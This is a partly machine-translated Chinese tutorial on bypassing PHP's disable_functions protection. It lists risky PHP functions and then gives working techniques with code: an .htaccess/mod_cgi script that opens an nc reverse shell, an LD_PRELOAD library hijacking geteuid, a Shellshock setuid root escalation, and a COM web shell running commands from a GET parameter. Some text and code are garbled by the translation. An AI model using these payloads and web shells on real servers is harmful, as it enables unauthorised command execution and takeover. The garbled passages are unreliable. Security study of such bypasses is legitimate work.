Methods bypass disable_function and ants sword plug-bypass-php-function use
In learning php, we found that many sites function will cause great danger hidden or system, common risk functions are:
phpinfo()
功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。
危险等级:中
passthru()
功能描述:允许执行一个外部程序并回显输出,类似于 exec()。
危险等级:高
exec()
功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。
危险等级:高
system()
功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。
危险等级:高
chroot()
功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式
PHP 时才能工作,且该函数不适用于 Windows 系统。
危险等级:高
scandir()
功能描述:列出指定路径中的文件和目录。
危险等级:中
chgrp()
功能描述:改变文件或目录所属的用户组。
危险等级:高
chown()
功能描述:改变文件或目录的所有者。
危险等级:高
shell_exec()
功能描述:通过 Shell 执行命令,并将执行结果作为字符串返回。
危险等级:高
proc_open()
功能描述:执行一个命令并打开文件指针用于读取以及写入。
危险等级:高
proc_get_status()
功能描述:获取使用 proc_open() 所打开进程的信息。
危险等级:高
error_log()
功能描述:将错误信息发送到指定位置(文件)。
安全备注:在某些版本的 PHP 中,可使用 error_log() 绕过 PHP safe mode,
执行任意命令。
危险等级:低
ini_alter()
功能描述:是 ini_set() 函数的一个别名函数,功能与 ini_set() 相同。
具体参见 ini_set()。
危险等级:高
ini_set()
功能描述:可用于修改、设置 PHP 环境配置参数。
危险等级:高
ini_restore()
功能描述:可用于恢复 PHP 环境配置参数到其初始值。
危险等级:高
dl()
功能描述:在 PHP 进行运行过程当中(而非启动时)加载一个 PHP 外部模块。
危险等级:高
pfsockopen()
功能描述:建立一个 Internet 或 UNIX 域的 socket 持久连接。
危险等级:高
syslog()
功能描述:可调用 UNIX 系统的系统层 syslog() 函数。
危险等级:中
readlink()
功能描述:返回符号连接指向的目标文件内容。
危险等级:中
symlink()
功能描述:在 UNIX 系统中建立一个符号链接。
危险等级:高
popen()
功能描述:可通过 popen() 的参数传递一条命令,并对 popen() 所打开的文件进行执行。
危险等级:高
stream_socket_server()
功能描述:建立一个 Internet 或 UNIX 服务器连接。
危险等级:中
putenv()
功能描述:用于在 PHP 运行时改变系统字符集环境。在低于 5.2.6 版本的 PHP 中,可利用该函数
修改系统字符集环境后,利用 sendmail 指令发送特殊参数执行系统 SHELL 命令。
危险等级:高
php ini configuration file there is a disable_functions option, it can disable the function of these dangers
But nothing is absolutely safe, here talked about several ways to circumvent the disable_functions:
1、apache mod_cgi
Here we need to use .htaccess and mod_cgi
1).htaccess
In the file upload, we are already familiar. For details, Baidu (I know it's only an idea of the role of full-line is Baidu Encyclopedia answer ...)
Under normal circumstances, you should not use .htaccess files unless you do not have access to the main configuration file; .htaccess files should be used in the content providers need to change the configuration of the server under root privileges but no case for a particular directory. If you do not want to frequently modify the configuration server administrator, you can allow users to make changes to the configuration file .htaccess, especially ISP users to run multiple sites on the same machine, but the user may want to change their case configuration.
2)mod_cgi
In the non-threaded MPM ( preforksupport for CGI script execution on)
Have any MIME type application/x-httpd-cgior the cgi-scriptfile processor will be treated as a CGI script by the server is running, its output will be returned to the client. It allows two ways to become a CGI script files, one is the file that has been AddTypethe extension of the definition of instruction, and the other is located in the file ScriptAliasdirectory
Apache Reference Manual:https://www.php.cn/manual/view/17782.html#env
If the .htaccess file is modified attacker, the attacker can take advantage of mod_cgi apache module, directly bypassing any restrictions of PHP to execute system commands
We need to meet several conditions:
第一,必须是apache环境
第二,mod_cgi已经启用
第三,必须允许.htaccess文件,也就是说在httpd.conf中,要注意AllowOverride选项为All,而不是none
第四,必须有权限写.htaccess文件
Example:
.htaccess内容:
Options +ExecCGI
AddHandler cgi-script .zwi #这里的.zwi是我构造的,表示.zwi后缀的文件都会被当作cgi脚本执行
shell.zwi
#!/bin/sh
echo&&cd "/var/www/html";ls -al;echo [S];pwd;echo [E]
annotation:
Options指令是Apache配置文件中一个比较常见也比较重要的指令,Options指令可以在Apache服务器核心配置(server config)、虚拟主机配置(virtual host)、特定目录配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目录将启用哪些服务器特性。
关于Options指令后可以附加的特性选项的具体作用及含义,可以参考这篇文章:http://www.365mini.com/page/apache-options-directive.htm
当然我们用到的就是ExecCGI选项,表示允许使用mod_cgi模块执行CGI脚本
Local test:
<?php
$cmd = "nc -c'/bin/bash' 127.0.0.1 4444"; //反弹一个shell出来,这里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"Content-Type: text/html\\n\\n\"\n"; //需要指定这个header,否则会返回500
$shellfile .="$cmd";
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
echo "$text: " . ($condition ?$yes : $no) . "<br>\n";
}
if(!isset($_GET['checked']))
{
@file_put_contents('.htaccess',"\nSetEnv HTACCESS on", FILE_APPEND);
header('Location: ' . $_SERVER['PHP_SELF']. '?checked=true'); //执行环境的检查
}
else
{
$modcgi = in_array('mod_cgi',apache_get_modules()); // 检测mod_cgi是否开启
$writable = is_writable('.'); //检测当前目录是否可写
$htaccess = !empty($_SERVER['HTACCESS']);//检测是否启用了.htaccess
checkEnabled("Mod-Cgienabled",$modcgi,"Yes","No");
checkEnabled("Iswritable",$writable,"Yes","No");
checkEnabled("htaccessworking",$htaccess,"Yes","No");
if(!($modcgi && $writable&& $htaccess))
{
echo "Error. All of the above mustbe true for the script to work!"; //必须满足所有条件
}
else
{
checkEnabled("Backing
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in
.htaccess.bak","Failed!"); //备份一下原有.htaccess
checkEnabled("Write
.htaccessfile",file_put_contents('.htaccess',"Options
+ExecCGI\nAddHandlercgi-script
.dizzle"),"Succeeded!","Failed!");//.dizzle,我们的特定扩展名
checkEnabled("Write shellfile",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!");//写入文件
checkEnabled("Chmod777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");//给权限
echo "Executing the script now.Check your listener <img src = 'shell.dizzle' style ='display:none;'>"; //调用
}
}
?>
ctf例题:ctfhub--bypass_disable_function
2、LD_PRELOAD
LD_PRELOAD is an environment variable in linux
It allows you to define priority before the program runs loaded dynamic link library. This function is mainly used for the same function selectively loading different dynamic link library. Through this environment variable, we can load other dynamic link library in the middle of the main program and its dynamic link library, or even override the normal function library. On the one hand, we can use this feature to use your own or better function (without having someone else's source code), and on the other hand, we can also program the injection procedure to others, so as to achieve a specific purpose.
This shows that we can almost hijacked most of the functions of PHP
We should use the putenv (), i.e., set system environment variables, for example:putenv("NLS_LANG=american_taiwan.zht16big5");
You may also be extended a getenv (), get the system environment variables, for example:$ip = getenv(“REMOTE_ADDR”);
readelf command, usually used to view the ELF file format information, common file as executable files on Linux, dynamic library ( .so) or static library ( .a) and other file contains the ELF format
test:
1, the first to write a dynamic-link file zwish.c
#include<stdlib.h>
#include <stdio.h>
#include<string.h>
void payload(){
system("touch /var/www/html/zwish.txt");
}
int geteuid(){
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
When the shared library geteuid is called, try to load the payload () function, execute the command, create a zwish.txt in / var / www under / html directory
Compilegcc -c -fPIC zwish.c -o zwish
gcc -shared zwish -o zwish.so
The decentralization zwish.so / var / www / html
Then write a index.php
<?php
putenv("LD_PRELOAD=/var/www/html/zwish.so");
mail("admin@localhost","","","","");
?>
Visit the php, find the directory appeared zwish.txt
3、shellshock
Shellshock, also known as Bashdoor, is a security vulnerability Bash shell widely used in Unix is, for the first time on September 24, 2014 open. Many Internet daemons, such as web servers, using bash to process certain commands, allowing an attacker to execute arbitrary code on the vulnerable version of Bash. This can be exploited to access the computer system without authorization. - Excerpt from Wikipedia
1) environment to build
Install version 4.1 bash with root privileges (at least version 4.2 of the holes have been plugged)
bash4.1 original download address is HTTP: //ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,
in order speed, here we use the following Download http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install
#测试是否有bash漏洞,输出vulnerable的话,说明bash有漏洞
$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
$ sudo ln -sf /bin/bash /bin/sh #最后,让/bin/sh 指向/bin/bash.
Take a look at ShellShock vulnerabilities Mami (principle):
export foo='() { :; }; echo Hello World'
bash
>Hello World
Why invoke bash with the output Hello Worldof it? Look at the situation he's inside:
KEY = foo
VALUE = () { :; }; echo Hello World
bash reads the environment variable, after defining a function foo directly call back. Once bash calling, custom statements directly trigger.
Create a shock.c
#include <stdio.h>
void main()
{
setuid(geteuid()); // make real uid = effective uid.
system("/bin/ls -l");
}
Compilation, empowerment
$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock
Set program which is set-uid
Test, first exit administrator mode
exit
export foo='() { :; }; bash'
./shock
End execution will find that we have a direct root privileges
4、PHP_FPM
Specific Description: https://www.php.net/install.fpm
There is a good article: https://juejin.im/post/58db7d742f301e007e9a00a7
Invoked to explain some others:
(1) Why is there a php-fpm
All fpm appear because php-fastcgi appear. A good management program in order to achieve the php-fastcgi
(2) What is the php-fastcgi
php-fastcgi just a cgi program, php will parse the request and returns the result, does not manage (and therefore did not emerge until php-fpm).
(3)PHP_FPM
It is to start a program to manage a master process and multiple worker processes.
PHP-FPM creates a master process control when and how HTTP requests to one or more child process handling. PHP-FPM main process also controls what
it created when (process Web applications more traffic) and destruction (child process runs too long or no longer needed)
PHP child processes. Each process in the presence of PHP-FPM process pool than the time length of a single HTTP request, may be the
processing of an HTTP request 10,50,100,500 or more.
After PHP 5.3.3 php-fpm been incorporated into the core code of the php. Therefore, no separate php-fpm download and install.
To support php php-fpm, only you need to bring --enable-fpm php source code at compile time on it.
Specific bypass principle also have a very good article: https://zhuanlan.zhihu.com/p/75114351?from_voters_page=true
5, UAF
Re-release references loophole, for example GC UAF, Json Serializer UAF vulnerability, Backtrace UAF, etc.
6、FFI
FFI (Foreign Function Interface), i.e., the external function interface that allows C code to call from the user area. When all the PHP command execution function is disabled by PHP 7.4's new features can be achieved FFI call C code with PHP code that way, declare C in order to perform a function, and then call the C function to Bypass by FFI variable disable_functions
7, COM components
Conditions: Windows, php5.x, support COM components
Fundamental:
It is the first COM component design intent is to achieve cross-language program components reuse COM components to Win 32 issued by the dynamic link library (DLL) or executable (EXE) form of executable code composed. Follow the COM specification written by the assembly would be able to meet all the requirements of the component architecture. COM components can be provided to the application program, the operating system services, and other components; custom COM components can be connected together to form an application at run time with the other components; COM components can be dynamically inserted or discharged applications.
exp:
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
print($stroutput);
?>